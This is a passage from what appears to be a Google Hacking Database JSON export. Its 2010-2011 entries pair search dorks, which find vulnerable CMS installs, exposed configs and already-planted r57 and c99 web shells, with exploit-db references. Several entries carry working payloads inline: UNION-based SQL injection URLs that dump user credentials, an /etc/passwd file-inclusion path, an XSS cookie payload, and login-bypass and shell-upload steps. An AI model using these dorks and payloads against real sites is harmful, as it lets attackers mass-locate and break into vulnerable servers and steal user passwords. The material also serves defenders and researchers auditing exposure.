"\"Copyright Devellion Limited 2005. All rights reserved.\"", "long description": "CubeCart 3.0.11 (oid) Remote Blind SQL Injection - CVE: 2006-4267: http://www.exploit-db.com/exploits/2198", "submited": "2010-11-15", "request": "\"Copyright Devellion Limited 2005. All rights reserved.\"", "id": 3532}, {"short description": "inurl:/modules/debaser/", "long description": "XOOPS Module debaser 0.92 (genre.php) BLIND SQL Injection- CVE: 2007-1805: http://www.exploit-db.com/exploits/3630", "submited": "2010-11-15", "request": "inurl:/modules/debaser/", "id": 3533}, {"short description": "\"Powered by Quick.Cms\"", "long description": "Quick.Cms.Lite 0.3 (Cookie sLanguage) Local File Include - CVE: 2006-5834: http://www.exploit-db.com/exploits/2719", "submited": "2010-11-15", "request": "\"Powered by Quick.Cms\"", "id": 3534}, {"short description": "inurl:/modules/rmgallery/", "long description": "XOOPS Module RM+Soft Gallery 1.0 BLIND SQL Injection - CVE: 2007-1806: http://www.exploit-db.com/exploits/3633", "submited": "2010-11-15", "request": "inurl:/modules/rmgallery/", "id": 3535}, {"short description": "intext:\"2000-2001 The phpHeaven Team\"", "long description": "phpMyChat 0.14.5 (SYS enter) Remote Code Execution: http://www.exploit-db.com/exploits/1646", "submited": "2010-11-15", "request": "intext:\"2000-2001 The phpHeaven Team\"", "id": 3536}, {"short description": "\"Basado en Spirate\"", "long description": "Small Pirate v-2.1 (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4936: http://www.exploit-db.com/exploits/8819", "submited": "2010-11-15", "request": "\"Basado en Spirate\"", "id": 3537}, {"short description": "inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"", "long description": "PHPList 2.10.2 GLOBALS[] Remote Code Execution: http://www.exploit-db.com/exploits/1659", "submited": "2010-11-15", "request": "inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"", "id": 3538}, {"short description": "\"Barbecued by sNews\"", "long description": "sNews 1.5.30 Remote Reset Admin Pass / Command Exec Exploit - CVE: 2007-0261: http://www.exploit-db.com/exploits/3116", "submited": "2010-11-15", "request": "\"Barbecued by sNews\"", "id": 3539}, {"short description": "inurl:\"printable_pedigree.php\"", "long description": "Dog Pedigree Online Database 1.0.1b Blind SQL Injection: http://www.exploit-db.com/exploits/8740", "submited": "2010-11-15", "request": "inurl:\"printable_pedigree.php\"", "id": 3540}, {"short description": "\"powered by discuz!", "long description": "Discuz! 4.x SQL Injection / Admin Credentials Disclosure: http://www.exploit-db.com/exploits/2859", "submited": "2010-11-15", "request": "\"powered by discuz!", "id": 3542}, {"short description": "\"This web site was made with PostNuke\"", "long description": "PostNuke 0.763 (PNSV lang) Remote Code Execution - CVE: 2006-5733: http://www.exploit-db.com/exploits/2707", "submited": "2010-11-15", "request": "\"This web site was made with PostNuke\"", "id": 3543}, {"short description": "\"Powered by Shop-Script FREE\"", "long description": "Shop-Script FREE 2.0 Remote Command Execution - CVE: 2007-4932: http://www.exploit-db.com/exploits/4419/", "submited": "2010-11-15", "request": "\"Powered by Shop-Script FREE\"", "id": 3544}, {"short description": "\"LinPHA Version 1.3.x\" or \"The LinPHA developers\"", "long description": "LinPHA 1.3.1 (new_images.php) Remote Blind SQL Injection - CVE: 2007-4053: http://www.exploit-db.com/exploits/4242/", "submited": "2010-11-15", "request": "\"LinPHA Version 1.3.x\" or \"The LinPHA developers\"", "id": 3545}, {"short description": "\"powered by Quick.Cart\"", "long description": "Quick.Cart 2.0 (actions_client/gallery.php) Local File Include:http://www.exploit-db.com/exploits/2769", "submited": "2010-11-15", "request": "\"powered by Quick.Cart\"", "id": 3546}, {"short description": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "long description": "PHP-Update 2.7 Multiple Remote Vulnerabilities - CVE: 2006-6879:http://www.exploit-db.com/exploits/3017", "submited": "2010-11-15", "request": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "id": 3549}, {"short description": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "long description": "phpMyChat 0.15.0dev (SYS enter) Remote Code Execution:http://www.exploit-db.com/exploits/1647", "submited": "2010-11-15", "request": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "id": 3550}, {"short description": "\"Powered by MercuryBoard\"", "long description": "MercuryBoard 1.1.5 (login.php) Remote Blind SQL Injection - CVE: 2008-6632:http://www.exploit-db.com/exploits/5653", "submited": "2010-11-15", "request": "\"Powered by MercuryBoard\"", "id": 3551}, {"short description": "\"Powered by Coppermine Photo Gallery\"", "long description": "Coppermine Photo Gallery 1.4.18 LFI / Remote Code Execution - CVE: 2008-3481:http://www.exploit-db.com/exploits/6178", "submited": "2010-11-15", "request": "\"Powered by Coppermine Photo Gallery\"", "id": 3552}, {"short description": "\"Content managed by the Etomite Content Management System\"", "long description": "Etomite CMS 0.6.1 (username) SQL Injection - CVE: 2006-3904:http://www.exploit-db.com/exploits/2071", "submited": "2010-11-15", "request": "\"Content managed by the Etomite Content Management System\"", "id": 3555}, {"short description": "\"powered by PCPIN.com\"", "long description": "PCPIN Chat 5.0.4 (login/language) Remote Code Execution:http://www.exploit-db.com/exploits/1697", "submited": "2010-11-15", "request": "\"powered by PCPIN.com\"", "id": 3556}, {"short description": "\"Powered by Leap\"", "long description": "Leap CMS 0.1.4 (searchterm) Blind SQL Injection - CVE: 2009-1613:http://www.exploit-db.com/exploits/8576", "submited": "2010-11-15", "request": "\"Powered by Leap\"", "id": 3557}, {"short description": "inurl:\"option=com_tophotelmodule\"", "long description": "CVE: 2009-3368EDB-ID:This search potentially exposes Joomla Hotel Booking System XSS/SQL Injection Vulnerabilities", "submited": "2010-11-15", "request": "inurl:\"option=com_tophotelmodule\"", "id": 3558}, {"short description": "\"Runcms Copyright\" \"2002 - 2007\" +\"page created\"", "long description": "RunCms 1.5.2 (debug_show.php) Remote SQL Injection - CVE: 2007-2539:http://www.exploit-db.com/exploits/3850", "submited": "2010-11-15", "request": "\"Runcms Copyright\" \"2002 - 2007\" +\"page created\"", "id": 3563}, {"short description": "\"Powered by eXV2 Vers\"", "long description": "exV2 2.0.4.3 extract() Remote Command Execution - CVE: 2006-7080:http://www.exploit-db.com/exploits/2415", "submited": "2010-11-15", "request": "\"Powered by eXV2 Vers\"", "id": 3566}, {"short description": "\"Betrieben mit Serendipity 1.0.3\"", "long description": "Serendipity 1.0.3 (comment.php) Local File Include - CVE: 2006-6242:http://www.exploit-db.com/exploits/2869", "submited": "2010-11-15", "request": "\"Betrieben mit Serendipity 1.0.3\"", "id": 3567}, {"short description": "\"Powered by XMB\"", "long description": "XMB 1.9.6 Final basename() Remote Command Execution - CVE: 2006-4191:http://www.exploit-db.com/exploits/2178", "submited": "2010-11-15", "request": "\"Powered by XMB\"", "id": 3569}, {"short description": "\"Powered by BIGACE 2.5\"", "long description": "BIGACE CMS 2.5 (username) Remote SQL Injection - CVE: 2009-1778:http://www.exploit-db.com/exploits/8664", "submited": "2010-11-15", "request": "\"Powered by BIGACE 2.5\"", "id": 3571}, {"short description": "allintitle: powered by DeluxeBB", "long description": "DeluxeBB 1.2 Multiple Remote Vulnerabilities - CVE: 2008-2195:http://www.exploit-db.com/exploits/5550", "submited": "2010-11-15", "request": "allintitle: powered by DeluxeBB", "id": 3573}, {"short description": "\"Powered by Online Grades\"", "long description": "Online Grades &amp; Attendance 3.2.6 Blind SQL Injection - CVE: 2009-2598:http://www.exploit-db.com/exploits/8854", "submited": "2010-11-15", "request": "\"Powered by Online Grades\"", "id": 3574}, {"short description": "\"Powered by ClanTiger\"", "long description": "ClanTiger 1.1.1 (slug) Blind SQL Injection:  http://www.exploit-db.com/exploits/8473", "submited": "2010-11-15", "request": "\"Powered by ClanTiger\"", "id": 3576}, {"short description": "\"AlumniServer project\"", "long description": "AlumniServer 1.0.1 (resetpwemail) Blind SQL Injection:  http://www.exploit-db.com/exploits/9020", "submited": "2010-11-15", "request": "\"AlumniServer project\"", "id": 3577}, {"short description": "\"Powered by sendcard - an advanced PHP e-card program\"", "long description": "SendCard 3.4.0 Unauthorized Administrative Access:  http://www.exploit-db.com/exploits/2117", "submited": "2010-11-15", "request": "\"Powered by sendcard - an advanced PHP e-card program\"", "id": 3579}, {"short description": "inurl:imageview5", "long description": "Imageview 5 (Cookie/index.php) Remote Local Include - CVE: 2006-5554:http://www.exploit-db.com/exploits/2647", "submited": "2010-11-15", "request": "inurl:imageview5", "id": 3580}, {"short description": "\"This site is powered by e107\"", "long description": "TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602:http://www.exploit-db.com/exploits/2711", "submited": "2010-11-15", "request": "\"This site is powered by e107\"", "id": 3581}, {"short description": "\"powered by tikiwiki\"", "long description": "TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602:http://www.exploit-db.com/exploits/2288", "submited": "2010-11-15", "request": "\"powered by tikiwiki\"", "id": 3582}, {"short description": "\"This is a Free &amp; Open Source mailing list manager\"", "long description": "Open Newsletter", "submited": "2010-11-15", "request": "\"This is a Free &amp; Open Source mailing list manager\"", "id": 3584}, {"short description": "intitle:\"X7 Chat Help Center\"|\"Powered By X7 Chat\"", "long description": "X7 Chat 2.0 (help_file) Remote Commands Execution - CVE: 2006-2156:http://www.exploit-db.com/exploits/1738", "submited": "2010-11-15", "request": "intitle:\"X7 Chat Help Center\"|\"Powered By X7 Chat\"", "id": 3585}, {"short description": "\"powered by gcards\"", "long description": "gCards 1.45 Multiple Vulnerabilities - CVE: 2006-1346:http://www.exploit-db.com/exploits/1595", "submited": "2010-11-15", "request": "\"powered by gcards\"", "id": 3586}, {"short description": "pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"", "long description": "Pixelpost 1-5rc1-2 Remote Privilege Escalation Exploit - CVE: 2006-2889:http://www.exploit-db.com/exploits/1868", "submited": "2010-11-15", "request": "pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"", "id": 3587}, {"short description": "\"This web site was made with MD-Pro\"", "long description": "CVE: 2006-7112EDB-ID: 2712This search can potentially identify vulnerable installations of MD-Pro, a web portal system written in PHP.", "submited": "2010-11-15", "request": "\"This web site was made with MD-Pro\"", "id": 3589}, {"short description": "\"Powered by XMB\"", "long description": "CVE: 2006-3994EDB-ID: 2105This search can potentially identify vulnerable installations of XMB", "submited": "2010-11-15", "request": "http://www.google.com/search?q=\"Powered+by+XMB\"", "id": 3590}, {"short description": "\"powered by ThWboard\"", "long description": "CVE: 2007-0340EDB-ID: 3124This search can potentially identify vulnerable installations of ThWboard.", "submited": "2010-11-15", "request": "\"powered by ThWboard\"", "id": 3591}, {"short description": "\"Page created in\" \"seconds by glFusion\" +RSS", "long description": "CVE: 2009-1281EDB-ID: 8347This search can potentially identify vulnerable installations of glFusion.http://www.exploit-db.com/exploits/8347", "submited": "2010-11-15", "request": "\"Page created in\" \"seconds by glFusion\" +RSS", "id": 3592}, {"short description": "inurl:wp-login.php Register Username Password -echo", "long description": "CVE: 2006-2667EDB-ID: 6This search can potentially identify vulnerable installations of WordPress.", "submited": "2010-11-15", "request": "inurl:wp-login.php Register Username Password -echo", "id": 3593}, {"short description": "\"this site is using the webspell script (version: 4.01.02)\"", "long description": "CVE: 2007-0502EDB-ID: 3172This search can potentially identify vulnerable installations of webSPELL 4.01.02", "submited": "2010-11-15", "request": "\"this site is using the webspell script (version: 4.01.02)\"", "id": 3594}, {"short description": "insite: SmarterMail Enterprise 7.1", "long description": "http://www.exploit-db.com/exploits/15185", "submited": "2010-11-15", "request": "SmarterMail Enterprise 7.1", "id": 3595}, {"short description": "inurl:\"com_sqlreport\"", "long description": "Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability - CVE: 2010-0753:  http://www.exploit-db.com/exploits/11549", "submited": "2010-11-15", "request": "inurl:\"com_sqlreport\"", "id": 3596}, {"short description": "\"Powered by Quick.Cart\"", "long description": "Quick.Cart 2.2 RFI/LFI Remote Code Execution Exploit - CVE: 2007-3138:  http://www.exploit-db.com/exploits/4025", "submited": "2010-11-15", "request": "\"Powered by Quick.Cart\"", "id": 3598}, {"short description": "\"Powered by Shadowed Portal\"", "long description": "Shadowed Portal 5.7d3 Remote Command Execution Exploit:  http://www.exploit-db.com/exploits/4768", "submited": "2010-11-15", "request": "\"Powered by Shadowed Portal\"", "id": 3599}, {"short description": "\"powered by bitweaver\"", "long description": "bitweaver 1.3 (tmpImagePath) Attachment mod_mime Exploit - CVE: 2006-3105:  http://www.exploit-db.com/exploits/1918", "submited": "2010-11-15", "request": "\"powered by bitweaver\"", "id": 3600}, {"short description": "inurl:\"index.php?ind=blog\"", "long description": "MKPortal 1.2.1  Multiple Remote Vulnerabilities:  http://www.exploit-db.com/exploits/7796/", "submited": "2010-11-15", "request": "inurl:\"index.php?ind=blog\"", "id": 3601}, {"short description": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "long description": "NOCC Webmail 1.0 (Local Inclusion) Remote Code Execution Exploit - CVE: 2006-0891:  http://www.exploit-db.com/exploits/1522/", "submited": "2010-11-15", "request": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "id": 3603}, {"short description": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"", "long description": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"or refinedinurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"Various \"tinybrowser\" vulnerabilities:http://www.exploit-db.com/exploits/9296/DigiP", "submited": "2010-11-18", "request": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"", "id": 3609}, {"short description": "inurl:/level/15/exec/-/configure/http", "long description": "Default Cisco 2800 Series page", "submited": "2010-11-21", "request": "inurl:/level/15/exec/-/configure/http", "id": 3610}, {"short description": "inurl:/exec/show/tech-support/cr", "long description": "Default Cisco 2800 Series page", "submited": "2010-11-21", "request": "inurl:/exec/show/tech-support/cr", "id": 3611}, {"short description": "inurl:/level/15/exec/-", "long description": "Default Cisco 2800 Series page", "submited": "2010-11-21", "request": "inurl:/level/15/exec/-", "id": 3612}, {"short description": "inurl:\"?delete\" +intext:\"PHP version\" +intext:\"Safe_mode\"", "long description": "Matches some well known phpshells (r57 and the like).", "submited": "2010-11-24", "request": "inurl:\"?delete\" +intext:\"PHP version\" +intext:\"Safe_mode\"", "id": 3614}, {"short description": "inurl:\"?act=phpinfo\"", "long description": "Match some well known phpshells (c99 and ironwarez and the like).", "submited": "2010-11-24", "request": "inurl:\"?act=phpinfo\"", "id": 3615}, {"short description": "\"Site produced by GeneralProducts.co.uk\"", "long description": "GeneralProducts (index.php?page=) Local File Inclusion Vulnerabilityhttp://server/index.php?page=../../../../../../etc/passwdNet.Edit0r - black.hat.tm@gmail.com", "submited": "2010-11-25", "request": "\"Site produced by GeneralProducts.co.uk\"", "id": 3616}, {"short description": "inurl:\"index.php?option=com_jeajaxeventcalendar\"", "long description": "Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection Vulnerability  Author: altbta", "submited": "2010-11-25", "request": "inurl:\"index.php?option=com_jeajaxeventcalendar\"", "id": 3617}, {"short description": "\"Powered by SiteEngine\"", "long description": "SiteEngine 7.1 SQL injection Vulnerability:  http://www.exploit-db.com/exploits/15612", "submited": "2010-11-25", "request": "\"Powered by SiteEngine\"", "id": 3618}, {"short description": "filetype: log inurl:\"access.log\" +intext:\"HTTP/1.1\"", "long description": "Match some apache access.log files.Author: susmab", "submited": "2010-11-25", "request": "filetype: log inurl:\"access.log\" +intext:\"HTTP/1.1\"", "id": 3619}, {"short description": "inurl:\"index.php?option=com_competitions\"", "long description": "SQL Injection:  http://127.0.0.1/index.php?option=com_competitions&amp;task=view&amp;id=-9 union all select 1,2,3,4,group_concat(username,0x3a,email,0x3a,password),6,7 from jos_users--           and XSS:   http://127.0.0.1/index.php?option=com_competitions&amp;menu=XroGuE       Author: Ashiyane Digital Security Team", "submited": "2010-11-25", "request": "inurl:\"index.php?option=com_competitions\"", "id": 3620}, {"short description": "inurl:\"index.php?option=com_storedirectory\"", "long description": "SQL Injection Vulnerability:   http://127.0.0.1/index.php?option=com_storedirectory&amp;task=view&amp;id=-16 UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_usersAuthor: Ashiyane Digital Security Team", "submited": "2010-11-25", "request": "inurl:\"index.php?option=com_storedirectory\"", "id": 3621}, {"short description": "inurl:\"index.php?option=com_catalogue\"", "long description": "Author: Ashiyane Digital Security Team        SQL Injection:  http://server/index.php?option=com_catalogue&amp;Itemid=73&amp;cat_id=-999 union select 1,version(),user(),4,5,6", "submited": "2010-11-25", "request": "inurl:\"index.php?option=com_catalogue\"", "id": 3622}, {"short description": "inurl:index.php?option=com_doqment&amp;cid=", "long description": "Author: KedAns-Dz       http://server/index.php?option=com_doqment&amp;cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--", "submited": "2010-11-25", "request": "inurl:index.php?option=com_doqment&amp;cid=", "id": 3623}, {"short description": "inurl:\"index.php?option=com_annuaire\"", "long description": "SQL Injection Vulnerability:[+] vuln: http://127.0.0.1/index.php?option=com_annuaire&amp;view=annuaire&amp;type=cat&amp;id=[SQLi][+] Exploit: /**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--Submitter:  Ashiyane Digital Security Team", "submited": "2010-12-01", "request": "inurl:\"index.php?option=com_annuaire\"", "id": 3624}, {"short description": "\"Powered By Dejcom Market CMS\"", "long description": "Submitter:Mormoroth   PoC:  http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--", "submited": "2010-12-04", "request": "\"Powered By Dejcom Market CMS\"", "id": 3625}, {"short description": "php Kolay Forum (php KF) 2007 - 2010 phpKF Ekibi", "long description": "Submitter:  FreWaL  CSRF Vulnerability:  http://www.exploit-db.com/exploits/15685", "submited": "2010-12-05", "request": "php Kolay Forum (php KF) 2007 - 2010 phpKF Ekibi", "id": 3626}, {"short description": "\"SOOP Portal 2.0\"", "long description": "Submitted by:  Net.Edit0r  Shell Upload: http://www.exploit-db.com/exploits/15690", "submited": "2010-12-05", "request": "\"SOOP Portal 2.0\"", "id": 3627}, {"short description": "inurl:index.php?option=com_lqm \"showResults\"", "long description": "Submitter:  Snakespc   SQL Injection:  http://server/index.php?option=com_lqm&amp;query=7&amp;task=showResults&amp;Itemid=158&amp;lang=en&amp;lqm_individual_id=-223+UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12+from+cil_site.jos_us", "submited": "2010-12-05", "request": "inurl:index.php?option=com_lqm \"showResults\"", "id": 3628}, {"short description": "intitle:PhpMyAdmin inurl:error.php", "long description": "intitle:PhpMyAdmin inurl:error.php", "submited": "2010-12-06", "request": "PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification", "id": 3629}, {"short description": "inurl:page.php?intPageID=", "long description": "Submitter: Srblche   SQL Injection:  http://server/page.php?intPageID=[SQL]", "submited": "2010-12-06", "request": "inurl:page.php?intPageID=", "id": 3630}, {"short description": "inurl:configuration.php-dist", "long description": "locates the default configuration file of  JOOMLA Author: ScOrPiOn", "submited": "2010-12-07", "request": "inurl:configuration.php-dist", "id": 3631}, {"short description": "inurl:\"config.php.new\" +vbulletin", "long description": "locates the default configuration file for vBulletin (/includes/config.php.new) Author: MaXe", "submited": "2010-12-07", "request": "inurl:\"config.php.new\" +vbulletin", "id": 3632}, {"short description": "\"[ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]\"", "long description": "Locates r57 web shells Author: ScOrPiOn", "submited": "2010-12-07", "request": "\"[ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]\"", "id": 3633}, {"short description": "\"r57shell 1.4\"", "long description": "Locates r57 web shells Author: ScOrPiOn", "submited": "2010-12-07", "request": "\"r57shell 1.4\"", "id": 3634}, {"short description": "\"r57shell\"", "long description": "Locates r57 web shells Author: ScOrPiOn", "submited": "2010-12-07", "request": "\"r57shell\"", "id": 3635}, {"short description": "\"Powered by SOOP Portal Raven 1.0b\"", "long description": "Submitter: Sun Army - http://www.exploit-db.com/exploits/15703", "submited": "2010-12-07", "request": "\"Powered by SOOP Portal Raven 1.0b\"", "id": 3636}, {"short description": "\"safe_mode: *  PHP version: *  cURL: *  MySQL: *  MSSQL: *  PostgreSQL: *  Oracle: *\"", "long description": "Locates r57 web shells Author: ScOrPiOn", "submited": "2010-12-07", "request": "\"safe_mode: *  PHP version: *  cURL: *  MySQL: *  MSSQL: *  PostgreSQL: *  Oracle: *\"", "id": 3637}, {"short description": "\"plugins/wp-db-backup/wp-db-backup.php\"", "long description": "Many of the results of the search show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. Author: ScOrPiOn", "submited": "2010-12-08", "request": "\"plugins/wp-db-backup/wp-db-backup.php\"", "id": 3638}, {"short description": "\"www.*.com - c99shell\" OR \"www.*.net - c99shell\" OR \"www.*.org - c99shell\"", "long description": "Locates c99 web shells Author: ScOrPiOn", "submited": "2010-12-08", "request": "\"www.*.com - c99shell\" OR \"www.*.net - c99shell\" OR \"www.*.org - c99shell\"", "id": 3639}, {"short description": "\"CGI-Telnet Unit-x Team Connected to *.com\" OR \"CGI-Telnet Unit-x Team Connected to\"", "long description": "Locates CGI-Telnet web shells. Author: ScOrPiOn", "submited": "2010-12-09", "request": "\"CGI-Telnet Unit-x Team Connected to *.com\" OR \"CGI-Telnet Unit-x Team Connected to\"", "id": 3640}, {"short description": "inurl:phpinfo.php", "long description": "Locates phpinfo files. A phpinfo file Outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment , the PHP environment, OS version information, paths, master and local values of configuration options, HTTP headers, and the PHP License. Author: ScOrPiOn", "submited": "2010-12-10", "request": "inurl:phpinfo.php", "id": 3641}, {"short description": "inurl:/vb/install/install.php", "long description": "Vbulletin installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations. Author: ScOrPiOn", "submited": "2010-12-10", "request": "inurl:/vb/install/install.php", "id": 3642}, {"short description": "inurl:/vb/install/upgrade.php", "long description": "Vbulletin custom updrade wizards. Author: ScOrPiOn", "submited": "2010-12-10", "request": "inurl:/vb/install/upgrade.php", "id": 3643}, {"short description": "inurl:com_amresurrected", "long description": "Submitter: Bl4ck.Viper   SQL Injection:  index.php?option=com_amresurrected&amp;Itemid=[Sqli]", "submited": "2010-12-10", "request": "inurl:com_amresurrected", "id": 3644}, {"short description": "allinurl:/xampp/security.php", "long description": "XAMPP Security Setting Page Information Disclosure. Author: modpr0be", "submited": "2010-12-13", "request": "allinurl:/xampp/security.php", "id": 3645}, {"short description": "inurl:panorama-viewer.php?id=", "long description": "[-]http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--[-] http://server/adm/users.php[-] http://server/adm/panorama_edit.php?id=1[-] http://server/listimages/shell.php#################################################################Great 2 : : h4m1d  /sheisebaboo / vc.emliter / Neo / H-SK33PY / Net.Editor /HUrr!c4nE / Cair3x /novin security team and all iranian hackers#################################################################", "submited": "2010-12-14", "request": "inurl:panorama-viewer.php?id=", "id": 3646}, {"short description": "inurl:showcat.asp?id=", "long description": "========================================Centralia (admin/dbedit.asp?) Bypass and Shell Upload Vulnerability========================================################################################################## Exploit :  Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability# Date    :   10 December 2010# Author  :  ali.erroor# Version :  n/a# Googel DorK    :   inurl:showcat.asp?id=# Home    :  www.network-security.ir# Email   :  ali.erroor@att.net#################################################################[+]  Exploit[1]  Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability..[-] http://localhost/path/admin/dbedit.asp?table=products[-] username : 'or''='[-] password : 'or''='[2] Create New Upload Your Shell.Asp ..[-] http://localhost/path/admin/dbedit.asp?a=upload_init[3] To See Shell Edit Your uploads[-] http://localhost/path/uploads/shell;asp.jpg[+] Demo[-] http://server/admin/dbedit.asp?table=products[-] http://server/admin/dbedit.asp?a=upload_init#################################################################Great 2 : : h4m1d /sheisebaboo / vc.emliter / H-SK33PY / Net.Editor / HUrr!c4nE/ Cair3x /novin security team and all iranian hackers#################################################################", "submited": "2010-12-14", "request": "inurl:showcat.asp?id=", "id": 3647}, {"short description": "\"POWERED BY: WEBINSPIRE\"", "long description": "Author: ghost-dz   SQL Injection:  http://server/pages.php?id=30+and+1=0+union+select+1,concat(id,0x3a,usr,0x3a,pwd,0x3a,email),3,4,5,6+from+utenti--", "submited": "2010-12-14", "request": "\"POWERED BY: WEBINSPIRE\"", "id": 3648}, {"short description": "\"powered by simpleview CMS\"", "long description": "Author: Sun Army    XSS: /search/?searchString=\"&gt;alert(document.cookie)&amp;submitSearch.x=17&amp;submitSearch.y=13", "submited": "2010-12-15", "request": "\"powered by simpleview CMS\"", "id": 3649}, {"short description": "\"Powered By PageAdmin CMS Free Version\"", "long description": "Author: Sun Army      XSS:   /include/search.aspx?keycode=\"&gt;xss ByTakpar&amp;type=1&amp;language=en", "submited": "2010-12-15", "request": "\"Powered By PageAdmin CMS Free Version\"", "id": 3650}, {"short description": "intext: Copyright+MantisBT Group", "long description": "Mantis Bug Trackerhttp://mantisbt.orghttp://www.exploit-db.com/exploits/15735http://www.exploit-db.com/exploits/15736Thanks,*Gjoko 'LiquidWorm' Krstic**Information Security Engineer****Zero Science Lab*Macedonian Information Security Research &amp; Development Laboratoryhttp://www.zeroscience.mk+389 (0) 75 290 926+389 (0) 77 670 886", "submited": "2010-12-15", "request": "intext: Copyright+MantisBT Group", "id": 3651}, {"short description": "inurl:\"produtos.asp?produto=\"", "long description": "Submitter: Br0ly  http://www.exploit-db.com/exploits/15776", "submited": "2010-12-18", "request": "inurl:\"produtos.asp?produto=\"", "id": 3652}, {"short description": "inurl:com_jeauto", "long description": "LFI: http://www.exploit-db.com/exploits/15779", "submited": "2010-12-19", "request": "inurl:com_jeauto", "id": 3653}, {"short description": "\"Powered by: IRIran.net\"", "long description": "IRIran eShop Builder SQL Injection: http://server/patch/pages/index.php?id=0[SQL]Submitter: Ahoora", "submited": "2010-12-22", "request": "\"Powered by: IRIran.net\"", "id": 3654}, {"short description": "allinurl:index.php?db=information_schema", "long description": "Submitter: modpr0be      phpMyAdmin Direct Access to information_schema Database", "submited": "2010-12-23", "request": "allinurl:index.php?db=information_schema", "id": 3655}, {"short description": "\"Powered by CubeCart 3.0.4\"", "long description": "CSRF:http://www.exploit-db.com/exploits/15822", "submited": "2010-12-24", "request": "\"Powered by CubeCart 3.0.4\"", "id": 3656}, {"short description": "\"Powered by KaiBB 1.0.1\"", "long description": "Multiple Vulnerabilities:http://www.exploit-db.com/exploits/15846/", "submited": "2010-12-29", "request": "\"Powered by KaiBB 1.0.1\"", "id": 3657}, {"short description": "\"Website Design by Rocktime\"", "long description": "Submitter: n0n0x                 http://server/product.php?fdProductId=[SQL Injection]", "submited": "2010-12-29", "request": "\"Website Design by Rocktime\"", "id": 3658}, {"short description": "\"Powered by UNO.com.my\"", "long description": "Submitter: SiKodoQ              http://127.0.0.1/[path]/page.php?pid=[SQLi]", "submited": "2010-12-29", "request": "\"Powered by UNO.com.my\"", "id": 3659}, {"short description": "\"/index.php?id=cmp-noticias\"", "long description": "Submitter: xoron            http://server/index.php?id=cmp-noticias&amp;n=[SQLi]", "submited": "2010-12-29", "request": "\"/index.php?id=cmp-noticias\"", "id": 3660}, {"short description": "inurl:\"/gadmin/index.php\"", "long description": "Author: AtT4CKxT3rR0r1ST    SQL Injection:  www.site.com/gallery.php?id=null[Sql Injection]", "submited": "2011-01-02", "request": "inurl:\"/gadmin/index.php\"", "id": 3661}, {"short description": "\"Powered by YourTube v1.0\"", "long description": "Author: AtT4CKxT3rR0r1ST   CSRF:  http://www.exploit-db.com/exploits/15892", "submited": "2011-01-02", "request": "\"Powered by YourTube v1.0\"", "id": 3662}, {"short description": "inurl:\"com_eventcal\"", "long description": "Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]            RFI:  www.site.com/components/com_eventcal/eventcal.php?mosConfig_absolute_path=[shell.txt?]", "submited": "2011-01-02", "request": "inurl:\"com_eventcal\"", "id": 3663}, {"short description": "\"POWERED BY ALITALK\"", "long description": "intext:\"POWERED BY ALITALK\"", "submited": "2011-01-04", "request": "\"POWERED BY ALITALK\"", "id": 3665}, {"short description": "\"Powered by phpMySport\"", "long description": "intext:\"Powered by phpMySport\" Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15921/", "submited": "2011-01-06", "request": "\"Powered by phpMySport\"", "id": 3666}, {"short description": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" OR inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"", "long description": "Author: DigiP Multiple Vulnerabilities: http://www.exploit-db.com/exploits/9296/", "submited": "2011-01-09", "request": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" OR inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"", "id": 3667}, {"short description": "allintext:\"fs-admin.php\"", "long description": "A foothold using allintext:\"fs-admin.php\" shows the world readabledirectories of a plug-in that enables Wordpress to be used as a forum. Manyof the results of the search also show error logs which give an attacker theserver side paths including the home directory name. This name is often alsoused for the login to ftp and shell access, which exposes the system toattack. There is also an undisclosed flaw in version 1.3 of the software, asthe author has mentioned in version 1.4 as a security fix, but does not tellus what it 